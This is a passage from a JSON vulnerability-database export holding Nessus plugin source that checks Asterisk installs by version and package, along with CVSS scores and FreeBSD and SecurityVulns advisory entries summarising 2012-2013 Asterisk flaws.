Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-04-08T00:00:00", "type": "nessus", "title": "Fedora 18 : asterisk-11.2.2-1.fc18 (2013-4566)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2685"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:18"], "id": "FEDORA_2013-4566.NASL", "href": "https://www.tenable.com/plugins/nessus/65836", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-4566.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65836);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-2685\");\n script_bugtraq_id(58760);\n script_xref(name:\"FEDORA\", value:\"2013-4566\");\n\n script_name(english:\"Fedora 18 : asterisk-11.2.2-1.fc18 (2013-4566)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk Development Team has announced security releases for\nCertified Asterisk 1.8.15 and Asterisk 1.8, 10, and 11. 
The available\nsecurity releases are released as versions 1.8.15-cert2, 1.8.20.2,\n10.12.2, 10.12.2-digiumphones, and 11.2.2.\n\nThese releases are available for immediate download at\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases\n\nThe release of these versions resolve the following issues :\n\n - A possible buffer overflow during H.264 format\n negotiation. The format attribute resource for H.264\n video performs an unsafe read against a media attribute\n when parsing the SDP.\n\n This vulnerability only affected Asterisk 11.\n\n - A denial of service exists in Asterisk's HTTP server.\n AST-2012-014, fixed in January of this year, contained a\n fix for Asterisk's HTTP server for a remotely-triggered\n crash. While the fix prevented the crash from being\n triggered, a denial of service vector still exists with\n that solution if an attacker sends one or more HTTP POST\n requests with very large Content-Length values.\n\n This vulnerability affects Certified Asterisk 1.8.15,\n Asterisk 1.8, 10, and 11\n\n - A potential username disclosure exists in the SIP\n channel driver. 
When authenticating a SIP request with\n alwaysauthreject enabled, allowguest disabled, and\n autocreatepeer disabled, Asterisk discloses whether a\n user exists for INVITE, SUBSCRIBE, and REGISTER\n transactions in multiple ways.\n\n This vulnerability affects Certified Asterisk 1.8.15,\n Asterisk 1.8, 10, and 11\n\nThese issues and their resolutions are described in the security\nadvisories.\n\nFor more information about the details of these vulnerabilities,\nplease read security advisories AST-2013-001, AST-2013-002, and\nAST-2013-003, which were released at the same time as this\nannouncement.\n\nFor a full list of changes in the current releases, please see the\nChangeLogs :\n\nhttp://downloads.asterisk.org/pub/telephony/certified-asterisk/release\ns/ChangeLog-1.8.15-cert2\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-1.8.20.2\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-10.12.2\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-10.12.2-digiumphones\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-11.2.2\n\nThe security advisories are available at :\n\n -\n http://downloads.asterisk.org/pub/security/AST-2013-001.\n pdf\n\n -\n http://downloads.asterisk.org/pub/security/AST-2013-00\n 2.pdf\n\n -\n http://downloads.asterisk.org/pub/security/AST-2013-00\n 3.pdf\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-001.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-002.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-003.pdf\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/releases/\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-1.8.20.2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?29e5303b\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-10.12.2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a4695ab6\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-10.12.2-digiumphones\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?05ab7e1a\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-11.2.2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?16e35cb0\"\n );\n # http://downloads.asterisk.org/pub/telephony/certified-asterisk/releases/ChangeLog-1.8.15-cert2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d97a0e84\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=928550\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-April/101614.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dcf63440\"\n );\n script_set_attribute(\n 
attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"asterisk-11.2.2-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:25", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a username disclosure vulnerability related to INVITE, SUBSCRIBE and REGISTER transactions and improper settings for the configuration options 'alwaysauthreject', 'allowguest' and 'autocreatepeer'.", "cvss3": {}, "published": "2013-04-10T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver Username Disclosure (AST-2013-003)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_003.NASL", "href": 
"https://www.tenable.com/plugins/nessus/65898", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65898);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2264\");\n script_bugtraq_id(58764);\n\n script_name(english:\"Asterisk SIP Channel Driver Username Disclosure (AST-2013-003)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by an \ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by a username\ndisclosure vulnerability related to INVITE, SUBSCRIBE and REGISTER\ntransactions and improper settings for the configuration options\n'alwaysauthreject', 'allowguest' and 'autocreatepeer'.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-003.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-21013\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.20.2 / 10.12.2 / 11.2.2 / Certified Asterisk\n1.8.15-cert2 / Asterisk Business Edition C.3.8.1, or apply the\nappropriate patch listed in the Asterisk advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/21\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # 
We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 10x < 10.12.2\n if (version =~ \"^10([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"10.12.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 11x < 11.2.2\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.2.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 1.8.x < 1.8.20.2\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"1.8.20.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 1.8.15-cert1\n if (version =~ \"^1\\.8\\.15([^0-9]|$)\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.15-cert2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Business Edition C.3.x < C.3.8.1\n # Check granularity first\n if (version =~ \"^C(\\.3(\\.8)?)?$\")\n {\n errors = make_list(errors, \"The version, \" + version + \" is not granular enough to make a determination.\");\n continue;\n }\n # Now check version\n if (version =~ \"^C\\.3\\.([0-7]|8\\.0)([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"C.3.8.1\";\n vulnerable = -1;\n }\n\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were 
encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:45:44", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability related to HTTP POST requests with very large Content-Length header values.", "cvss3": {}, "published": "2013-04-10T00:00:00", "type": "nessus", "title": "Asterisk HTTP Content-Length Header DoS (AST-2013-002)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2686"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_002.NASL", "href": "https://www.tenable.com/plugins/nessus/65897", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65897);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2686\");\n 
script_bugtraq_id(58756);\n\n script_name(english:\"Asterisk HTTP Content-Length Header DoS (AST-2013-002)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by a\ndenial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by a denial of\nservice vulnerability related to HTTP POST requests with very large\nContent-Length header values.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-20967\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.20.2 / 10.12.2 / 11.2.2 / Certified Asterisk\n1.8.15-cert2, or apply the patch listed in the Asterisk advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 10x < 10.12.2\n if (version =~ \"^10([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"10.12.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 11x < 11.2.2\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.2.2\";\n vulnerable = 
ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 1.8.x < 1.8.20.2\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"1.8.20.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 1.8.15-cert1\n if (version =~ \"^1\\.8\\.15([^0-9]|$)\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.15-cert2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:33", "description": "\n\nAsterisk project reports:\n\nBuffer Overflow Exploit Through SIP SDP Header\nUsername disclosure in SIP channel driver\nDenial of Service in HTTP server\n\n\n", "cvss3": {}, "published": "2013-03-27T00:00:00", "type": "freebsd", "title": "asterisk -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686"], "modified": "2013-03-27T00:00:00", "id": "DAF0A339-9850-11E2-879E-D43D7E0C7C02", "href": "https://vuxml.freebsd.org/freebsd/daf0a339-9850-11e2-879e-d43d7e0c7c02.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe Asterisk project reports:\n\nRemote Crash From Late Arriving SIP ACK With SDP\nRemote Crash when Invalid SDP is sent in SIP Request\n\n\n", "cvss3": {}, "published": "2013-08-27T00:00:00", "type": "freebsd", "title": "asterisk -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-08-29T00:00:00", "id": "FD2BF3B5-1001-11E3-BA94-0025905A4771", "href": "https://vuxml.freebsd.org/freebsd/fd2bf3b5-1001-11e3-ba94-0025905a4771.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-19T15:51:33", "description": "\n\nAsterisk project reports:\n\nCrashes due to large stack allocations when using TCP\nDenial of Service Through Exploitation of Device 
State Caching\n\n\n", "cvss3": {}, "published": "2013-01-02T00:00:00", "type": "freebsd", "title": "asterisk -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2013-01-02T00:00:00", "id": "F7C87A8A-55D5-11E2-A255-C8600054B392", "href": "https://vuxml.freebsd.org/freebsd/f7c87a8a-55d5-11e2-a255-c8600054b392.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe Asterisk project reports:\n\nA 16 bit SMS message that contains an odd message length value will\n\t cause the message decoding loop to run forever. The message buffer is\n\t not on the stack but will be overflowed resulting in corrupted memory\n\t and an immediate crash.\nExternal control protocols, such as the Asterisk Manager Interface,\n\t often have the ability to get and set channel variables; this allows\n\t the execution of dialplan functions. Dialplan functions within\n\t Asterisk are incredibly powerful, which is wonderful for building\n\t applications using Asterisk. But during the read or write execution,\n\t certain dialplan functions do much more. For example, reading the SHELL()\n\t function can execute arbitrary commands on the system Asterisk is\n\t running on. Writing to the FILE() function can change any file that\n\t Asterisk has write access to. 
When these functions are executed from an\n\t external protocol, that execution could result in a privilege escalation.\n\n\n", "cvss3": {}, "published": "2013-12-16T00:00:00", "type": "freebsd", "title": "asterisk -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2013-12-16T00:00:00", "id": "0C39BAFC-6771-11E3-868F-0025905A4771", "href": "https://vuxml.freebsd.org/freebsd/0c39bafc-6771-11e3-868f-0025905a4771.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2021-06-08T18:47:32", "description": "SIP information disclosure and buffer overflow, HTTP DoS.", "edition": 2, "cvss3": {}, "published": "2013-04-01T00:00:00", "type": "securityvulns", "title": "Asterisk multiple security vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686"], "modified": "2013-04-01T00:00:00", "id": "SECURITYVULNS:VULN:12974", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12974", 
